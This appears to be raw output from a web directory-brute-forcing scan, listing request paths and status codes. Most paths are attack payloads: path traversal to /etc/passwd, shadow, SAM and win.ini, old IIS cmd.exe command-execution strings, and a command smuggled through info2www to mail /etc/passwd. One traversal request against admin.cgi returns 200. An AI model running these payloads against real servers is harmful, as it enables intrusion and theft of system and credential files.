/%2e/                [36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[33m (Status: 400)[0m [Size: 301]
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini[33m (Status: 400)[0m [Size: 301]
/../../../../../../../../../../etc/*[33m (Status: 400)[0m [Size: 301]
/../../../../        [33m (Status: 400)[0m [Size: 301]
/../../../../../../../../../../etc/passw*[33m (Status: 400)[0m [Size: 301]
/../../../../ all    [33m (Status: 400)[0m [Size: 301]
/../../../../../../../../boot.ini[33m (Status: 400)[0m [Size: 301]
/../../../../../../Scandisk.log[33m (Status: 400)[0m [Size: 301]
/../../../../../../../../../../etc/passwd[33m (Status: 400)[0m [Size: 301]
/../../../../../../../../../boot.ini[33m (Status: 400)[0m [Size: 301]
/../../../../../../../boot.ini[33m (Status: 400)[0m [Size: 301]
/../../../../../boot.ini[33m (Status: 400)[0m [Size: 301]
/../../../../../../boot.ini[33m (Status: 400)[0m [Size: 301]
/../../../../boot.ini[33m (Status: 400)[0m [Size: 301]
/../../../../../winnt/repair/sam._[33m (Status: 400)[0m [Size: 301]
/../../../../../etc/passwd[33m (Status: 400)[0m [Size: 301]
/../../../../config.sys[33m (Status: 400)[0m [Size: 301]
/../../../../etc/hosts[33m (Status: 400)[0m [Size: 301]
/../../../boot.ini   [33m (Status: 400)[0m [Size: 301]
/../../../../winnt/repair/sam._[33m (Status: 400)[0m [Size: 301]
/../../../../etc/passwd[33m (Status: 400)[0m [Size: 301]
/../../../autoexec.bat[33m (Status: 400)[0m [Size: 301]
/../../../etc/passwd [33m (Status: 400)[0m [Size: 301]
/../../boot.ini      [33m (Status: 400)[0m [Size: 301]
/../../../scandisk.log[33m (Status: 400)[0m [Size: 301]
/../../etc/passwd    [33m (Status: 400)[0m [Size: 301]
/../../passwd        [33m (Status: 400)[0m [Size: 301]
/../boot.ini         [33m (Status: 400)[0m [Size: 301]
/../../windows/user.dat[33m (Status: 400)[0m [Size: 301]
/../../shadow        [33m (Status: 400)[0m [Size: 301]
/../config.dat       [33m (Status: 400)[0m [Size: 301]
/../../winnt/win.ini [33m (Status: 400)[0m [Size: 301]
/../webserver.ini    [33m (Status: 400)[0m [Size: 301]
/./                  [36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/.htaccess/          [33m (Status: 403)[0m [Size: 287]
/.html/............*/config.sys[33m (Status: 403)[0m [Size: 307]
/.html/............./config.sys[33m (Status: 403)[0m [Size: 307]
/.html/............/autoexec.bat[33m (Status: 403)[0m [Size: 308]
/.htaccess           [33m (Status: 403)[0m [Size: 286]
/.htpasswd           [33m (Status: 403)[0m [Size: 286]
/.htpasswd/          [33m (Status: 403)[0m [Size: 287]
////./../.../boot.ini[33m (Status: 400)[0m [Size: 301]
/DomainFiles/*//../../../../../../../../../../etc/passwd[33m (Status: 400)[0m [Size: 301]
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir[33m (Status: 400)[0m [Size: 301]
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\[33m (Status: 400)[0m [Size: 301]
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\[33m (Status: 400)[0m [Size: 301]
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir[33m (Status: 400)[0m [Size: 301]
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\[33m (Status: 400)[0m [Size: 301]
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir[33m (Status: 400)[0m [Size: 301]
/bin/scripts/../../../../winnt/system32/cmd.exe /c+dir?/c+dir%20c:\[33m (Status: 400)[0m [Size: 301]
/cgi-bin/            [33m (Status: 403)[0m [Size: 285]
/cgi-bin/../../../../winnt/system32/cmd.exe[33m (Status: 400)[0m [Size: 301]
/cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe[33m (Status: 400)[0m [Size: 301]
/cgi-bin/.htaccess   [33m (Status: 403)[0m [Size: 294]
/cgi-bin/.htaccess.old[33m (Status: 403)[0m [Size: 298]
/cgi-bin/.htaccess.save[33m (Status: 403)[0m [Size: 299]
/cgi-bin/.htaccess~  [33m (Status: 403)[0m [Size: 295]
/cgi-bin/.htpasswd   [33m (Status: 403)[0m [Size: 294]
/cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe[33m (Status: 400)[0m [Size: 301]
/cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe[33m (Status: 400)[0m [Size: 301]
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd[32m (Status: 200)[0m [Size: 820]
/cgi-bin/admin.cgi   [32m (Status: 200)[0m [Size: 820]
/cgi-bin/info2www '(../../../../../../../bin/mail root </etc/passwd>[33m (Status: 400)[0m [Size: 301]
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[33m (Status: 400)[0m [Size: 301]
/cgi-bin/test.cgi    [32m (Status: 200)[0m [Size: 1058356]
/icons/              [33m (Status: 403)[0m [Size: 283]
/index.php/123       [36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php/\         [36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?IDAdmin=test[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?SqlQuery=test%20[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?action=search&searchFor=\[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?base=test%20[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?download=/etc/passwd[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?download=/windows/win.ini[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?file=Liens&op=\[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?module=My_eGallery[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?file=index.php[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?download=/winnt/win.ini[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?page=../../../../../../../../../../boot.ini[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?page=../../../../../../../../../../etc/passwd[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?pymembs=admin[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?sql_debug=1[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?tampon=test%20[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?vo=       [36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/index.php?|=../../../../../../../../../etc/passwd[36m (Status: 302)[0m [Size: 0][34m [--> site/index.php/][0m
/msadc/../../../../winnt/system32/cmd.exe?/c+dir[33m (Status: 400)[0m [Size: 301]
/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\[33m (Status: 400)[0m [Size: 301]
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir[33m (Status: 400)[0m [Size: 301]
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\[33m (Status: 400)[0m [Size: 301]
/scripts/../../cmd.exe[33m (Status: 400)[0m [Size: 301]
/scripts/../../winnt/system32/cmd.exe?/c+dir[33m (Status: 400)[0m [Size: 301]
/server-status       [33m (Status: 403)[0m [Size: 290]
